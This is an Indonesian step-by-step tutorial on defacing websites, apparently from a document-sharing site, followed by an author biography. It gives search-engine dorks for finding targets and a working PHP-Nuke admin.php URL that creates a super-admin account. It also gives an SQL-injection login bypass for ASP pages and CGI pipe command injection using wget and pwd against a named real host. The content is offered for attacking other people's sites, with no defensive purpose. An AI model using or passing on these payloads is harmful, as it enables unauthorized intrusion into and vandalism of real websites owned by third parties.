Docstoc

CARA DAN LANGKAH DEFACE

Document Sample
CARA DAN LANGKAH DEFACE Powered By Docstoc
					Cara dan langkah DEFACE

Apa itu deface? Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi.

Defacer website dapat merubah tampilan sebagian atau seluruhnya tergantung kemauan defacer dan lubang yang bisa dimasuki, namun jika dia sudah putus asa, defacer akan melakukan denial of servis (DoS) attack yaitu mengirimkan request palsu pada server yang berlebihan sehingga kerja server lambat dan lama-kelamaan server akan crash dan down. Itulah deface. Nah kalo udah ngerti apa itu defase, sekarang giliran cara melakukan deface....

Berikut cara langkah langkah untuk melakukan deface

Deface situs php nuke

Pake mbah www.google.com ketik kalimat berikut : allinurl:.com/nuke/index.php atau allinurl:.org/nuke/index.php. Nah ….. kalo udah ketemu targetnya maka langkah selanjutnya adalah : 1. www.target.com/nuke/index.php 2. www.target.com/nuke/admin.php => (index.php yg diatas tadi dirubah menjadi admin.php)

3. Masukkan bug ini di belakang situs tadi : ?op=AddAuthor&add_aid=smartbekantan&add_name= God&add_pwd=render07&add_email= bekantan@yahoo.com&add_radminsuper=1&admin= eCcgVU5JT04gU0VMRUNUIDEvKjox misal : www.target.com/nuke/admin.php?op=AddAuthor&add_aid=smartbekantan&add_nam e=God&add_pwd=render07&add_email= bekantan@yahoo.com&add_radminsuper=1&admin= eCcgVU5JT04gU0VMRUNUIDEvKjox

Jika tidak bisa berarti situs tersebut sudah dipath oleh admin nya. Tapi jika berhasil, maka di url/browsing akan muncul www.target.com/nuke/admin.php?op=mod_author 4. Login, dan masukan id & password tadi. Masih ingat kan ? id=smartbekantan => liat yg diatas tadi password=render07 => liat yg diatas tadi

Nah kita sekarang sudah masuk ke “Administration Menu” situs tersebut. Kamu sudah bisa utak atik dan menguasai website tersebut.

deface asp dgn sql injection 1. buka browsing/url www.google.co.id 2. ketik site:go.id login.asp misal nya kita dapat target www.situstarget.com/login.asp 3. username dan pass ketik ‘or”=’ 4. buka satu persatu file yg ada disana 5. cari file yg bisa kita ubah/deface 6. buka browsing/url baru lalu ketikkan target tadi misalnya www.situsarget.com 7. kalo hasil nya belum ada, klik tab refresh disamping url tersebut.

deface cgi https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/ web_store.cgi?page=coart_frontpage.html page="coart_frontpage.html|wget" nya =""> https://bronte.netpresence.com.au/~wolfsecu/arai.html…/home/sites/site52/users/wol fsecu/web/coartcds/Web_store <<< target =""> allinurl*.cgi * page:.*html+site:.us atau http://www.google.co.id/search?q=allinurl*.cgi%3Fpage%3D*.html+site:.com&hl=id&lr =&start=10&sa=N target harus file .html diujungnya jika ingin ditambah |pwd| <<< page="coart_frontpage.html|pwd|"

Itulah deface dan kamu sudah jadi defacer dan sudah jadi tersangka serta buronan sebagai defacer....

TENTANG PENULIS

Salam Sukses….! Perkenalkan nama saya Arip Rahman, anak pertama dari dua bersaudara. Lahir di Banjarmasin, Kalimantan Selatan, Indonesia, pada tanggal 31 Juli 1989.

Saat ini penulis menjalani kuliah di Fakultas Matematika dan Ilmu Pengetahuan Alam, Jurusan Ilmu Komputer, Universiatas Lambung Mangkurat.

Memiliki blog sebagai sumber pembelajaran dan untuk menuangkan inspirasi, adapun beberapa blog yang telah dibuat adalah : http://smartbekantan.blogspot.com http://unduhmedia.blogspot.com http://arhanata.blogspot.com http://logikahidup.blogspot.com http://www.vcc-ebook.co.cc


				
DOCUMENT INFO
Shared By:
Stats:
views:8244
posted:1/31/2010
language:Indonesian
pages:4
Description: Cara elakukan deface webite dengan php nuke